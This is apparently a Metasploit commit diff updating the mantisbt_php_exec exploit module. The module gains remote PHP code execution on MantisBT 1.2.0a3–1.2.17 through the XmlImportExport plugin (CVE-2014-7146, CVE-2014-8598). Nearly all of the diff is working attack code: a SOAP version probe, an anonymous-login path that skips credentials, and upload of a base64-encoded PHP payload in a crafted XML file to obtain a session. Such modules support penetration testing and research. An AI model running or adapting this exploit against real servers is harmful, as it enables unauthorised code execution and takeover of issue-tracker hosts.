Land rapid7#4528, mantisbt_php_exec improvements

wvu · wvu · commit ea793802cc15 · 2015-01-08T04:50:00.000-06:00
diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -17,16 +18,22 @@ def initialize(info = {})
         This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
         The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
         This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
+        This version also suffers from another issue. The import page is not checking the correct user level
+        of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'Egidio Romano', # discovery http://karmainsecurity.com
           'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
+          'Christian Mehlmauer'
         ],
       'References'     =>
         [
-          ['CVE', '2014-7146']
+          ['CVE', '2014-7146'],
+          ['CVE', '2014-8598'],
+          ['URL', 'https://www.mantisbt.org/bugs/view.php?id=17725'],
+          ['URL', 'https://www.mantisbt.org/bugs/view.php?id=17780']
         ],
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
@@ -42,49 +49,98 @@ def initialize(info = {})
       ], self.class)
   end
 
+  def get_mantis_version
+    xml = Document.new
+    xml.add_element(
+    "soapenv:Envelope",
+    {
+      'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
+      'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
+      'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+      'xmlns:man'     => "http://futureware.biz/mantisconnect"
+    })
+    xml.root.add_element("soapenv:Header")
+    xml.root.add_element("soapenv:Body")
+    body = xml.root.elements[2]
+    body.add_element("man:mc_version",
+      { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }
+    )
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'api', 'soap', 'mantisconnect.php'),
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'headers'  => { 'SOAPAction' => 'http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_version'},
+      'data'     => xml.to_s
+    })
+    if res && res.code == 200
+      match = res.body.match(/<ns1:mc_versionResponse.*><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
+      if match && match.length == 2
+        version = match[1]
+        print_status("Detected Mantis version #{version}")
+        return version
+      end
+    end
+
+    print_status("Can not detect Mantis version")
+    return nil
+  end
+
   def check
-    res = exec_php('phpinfo(); die();', true)
+    version = get_mantis_version
+
+    return Exploit::CheckCode::Unknown if version.nil?
+
+    gem_version = Gem::Version.new(version)
+    gem_version_introduced = Gem::Version.new('1.2.0a3')
+    gem_version_fixed = Gem::Version.new('1.2.18')
 
-    if res && res.body =~ /This program makes use of the Zend/
-      return Exploit::CheckCode::Vulnerable
+    if gem_version < gem_version_fixed && gem_version >= gem_version_introduced
+      return Msf::Exploit::CheckCode::Appears
     else
-      return Exploit::CheckCode::Unknown
+      return Msf::Exploit::CheckCode::Safe
     end
   end
 
   def do_login()
-    print_status('Checking access to MantisBT...')
+    # check for anonymous login
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
-      'vars_get' => {
-        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
-      }
-    })
-
-    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
-
-    session_cookie = res.get_cookies
-
-    print_status('Logging in...')
-    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, 'login.php'),
-      'cookie'    => session_cookie,
-      'vars_post' => {
-        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
-        'username' => datastore['username'],
-        'password' => datastore['password'],
-        'secure_session' => 'on'
-      }
+      'uri'      => normalize_uri(target_uri.path, 'login_anon.php')
     })
+    # if the redirect contains a username (non empty), anonymous access is enabled
+    if res && res.redirect? && res.redirection && res.redirection.query =~ /username=[^&]+/
+      print_status('Anonymous access enabled, no need to log in')
+      session_cookie = res.get_cookies
+    else
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
+        'vars_get' => {
+          'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
+        }
+      })
+      session_cookie = res.get_cookies
+      print_status('Logging in...')
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path, 'login.php'),
+        'cookie'    => session_cookie,
+        'vars_post' => {
+          'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
+          'username' => datastore['username'],
+          'password' => datastore['password'],
+          'secure_session' => 'on'
+        }
+      })
+      fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
+
+      fail_with(Failure::NoAccess, 'Wrong credentials') unless res && !res.redirection.to_s.include?('login_page.php')
+
+      session_cookie = "#{session_cookie} #{res.get_cookies}"
+    end
 
-
-    fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
-
-    fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
-
-    "#{session_cookie} #{res.get_cookies}"
+    session_cookie
   end
 
   def upload_xml(payload_b64, rand_text, cookies, is_check)
@@ -107,11 +163,16 @@ def upload_xml(payload_b64, rand_text, cookies, is_check)
       }
     })
 
-    unless res && res.code == 200
+    unless res && res.code == 200 && res.body
       print_error('Error trying to access XmlImportExport/import page...')
       return false
     end
 
+    if res.body.include?('Plugin is not registered with MantisBT')
+      print_error('XMLImportExport plugin is not installed')
+      return false
+    end
+
     # Retrieving CSRF token
     if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
       csrf_token = Regexp.last_match[1]
@@ -190,22 +251,37 @@ def upload_xml(payload_b64, rand_text, cookies, is_check)
     data_post = data.to_s
 
     print_status('Sending payload...')
-    return send_request_cgi({
+    res = send_request_cgi({
       'method'  => 'POST',
       'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
       'cookie' => cookies,
       'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
       'data'    => data_post
     }, timeout)
+
+    if res && res.body && res.body.include?('APPLICATION ERROR')
+      print_error('Error on uploading XML')
+      return false
+    end
+
+    # request above will time out and return nil on success
+    return true
   end
 
   def exec_php(php_code, is_check = false)
+    print_status('Checking access to MantisBT...')
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path)
+    })
+
+    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && (res.code == 200 || res.redirection)
 
     # remove comments, line breaks and spaces of php_code
     payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
 
     # clean b64 payload
-    while Rex::Text.encode_base64(payload_clean) =~ /=/
+    while Rex::Text.encode_base64(payload_clean).include?('=')
       payload_clean = "#{ payload_clean } "
     end
     payload_b64 = Rex::Text.encode_base64(payload_clean)
@@ -216,6 +292,8 @@ def exec_php(php_code, is_check = false)
 
     res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)
 
+    return unless res_payload
+
     # When a meterpreter session is active, communication with the application is lost.
     # Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
     cookies = do_login()
@@ -283,6 +361,7 @@ def exec_php(php_code, is_check = false)
   end
 
   def exploit
+    get_mantis_version
     unless exec_php(payload.encoded)
       fail_with(Failure::Unknown, 'Exploit failed, aborting.')
     end
